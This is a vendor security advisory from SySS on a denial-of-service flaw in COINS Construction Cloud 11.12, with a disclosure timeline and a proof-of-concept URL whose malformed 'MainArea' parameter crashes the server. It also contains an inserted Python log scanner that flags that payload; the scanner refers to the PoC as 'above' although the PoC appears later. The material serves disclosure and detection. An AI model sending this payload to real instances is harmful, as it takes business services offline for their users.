Advisory ID: SYSS-2021-028
Product: COINS Construction Cloud
Manufacturer: Construction Industry Solutions (COINS)
Affected Version(s): 11.12
Tested Version(s): 11.12
Vulnerability Type: CWE-707: Improper Neutralization
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2021-11-02
Solution Date: TBA
Public Disclosure: 2022-01-13
CVE Reference: CVE-2021-45223
Author of Advisory: Jürgen Zöller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

COINS Construction Cloud is an enterprise resource planning software specifically for the construction industry.

The manufacturer describes the product as follows (see [1]):

"COINS Construction Cloud is a powerful solution that enables construction companies, their subcontractors, suppliers and workforce – to work better together on site, off site, on the road and in the office."

Due to insufficient input neutralization, COINS Construction Cloud is vulnerable to denial-of-service attacks via forced server crashes.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

A logged-in user can force a server crash by sending an HTTP request with a malformed "MainArea" parameter. After a few seconds, the server becomes unresponsive, resulting in a complete denial of service.
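Because the trigger is a single malformed request parameter, the condition is easy to spot in web server access logs while a fix is pending. The following is an added example, not part of the SySS advisory or of COINS' own code: it parses combined-format access log lines, percent-decodes the "MainArea" parameter of requests to .p programs and flags values that fall outside an assumed conservative allowlist (the allowlist pattern, the log lines and the user names are constructed for the example; the flagged value is the one from the PoC URL above).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Allowlist for the MainArea parameter. This is an assumed conservative
# pattern chosen for the example, not a rule taken from COINS.
MAIN_AREA_OK = re.compile(r"[A-Za-z0-9_.%-]{1,64}")

# Combined-log-format prefix: address, ident, user, time, request, status.
ACCESS_LOG = re.compile(
    r'^(?P<addr>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def main_area_is_well_formed(value: str) -> bool:
    """True if the already percent-decoded MainArea value matches the allowlist."""
    return MAIN_AREA_OK.fullmatch(value) is not None

def suspicious_main_area_requests(log_lines):
    """Return (remote address, user, decoded MainArea) for every request to a
    .p program whose MainArea value fails the allowlist, regardless of status."""
    hits = []
    for line in log_lines:
        m = ACCESS_LOG.match(line)
        if not m:
            continue  # unparsable line: skip it rather than abort the scan
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(".p"):
            continue
        # parse_qs percent-decodes each value once; keep_blank_values also
        # surfaces an empty MainArea, which the allowlist rejects as well.
        for value in parse_qs(parts.query, keep_blank_values=True).get("MainArea", []):
            if not main_area_is_well_formed(value):
                hits.append((m.group("addr"), m.group("user"), value))
    return hits

# Constructed sample log lines. The second carries the MainArea value from the
# advisory's PoC URL; addresses, users and status codes are invented.
POC_MAIN_AREA = "a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c"
LOG_LINES = [
    '10.0.0.5 - alice [20/Apr/2021:10:00:01 +0200] "GET /env/prod/wou005.p'
    '?kco=24&MainArea=ActivityWB&FrameBanner=N HTTP/1.1" 200 5123',
    '10.0.0.9 - bob [20/Apr/2021:10:00:07 +0200] "GET /env/prod/wou005.p'
    f'?kco=24&TopMenu=%25WHOME&MainArea={POC_MAIN_AREA}&FrameBanner=N HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for addr, user, value in suspicious_main_area_requests(LOG_LINES):
        print(f"{addr} ({user}) sent malformed MainArea: {value!r}")
```

The same allowlist check, applied server-side before the parameter is processed, is the input neutralization the advisory identifies as missing.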
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Visit the following URL after logging in:

https://[target instance].coinscloud.com/env/[environment name]/wou005.p?kco=24&pvCILevel=2&pvCISibling=24&TopMenu=%25WHOME&MainArea=a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c&FrameBanner=N&frameID=1&program=wou005.p&updateContextHSA=ActivityWB&hs_actionRowid=?&info=cosval.activities&pvFrame=F%2C1664%2C196

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

TBA

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-04-20: Vulnerability discovered
2021-11-02: Vulnerability reported to manufacturer
2022-01-13: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for COINS Construction Cloud
    https://www.coins-global.com/solutions/47/
[2] SySS Security Advisory SYSS-2021-028
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-028.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Jürgen Zöller of SySS GmbH.

E-Mail: juergen.zoeller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Juergen_Zoeller.asc
Key ID: 0xA55C06902A34886E
Key Fingerprint: F279 067D A805 F18E BB71 E876 A55C 0690 2A34 886E

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en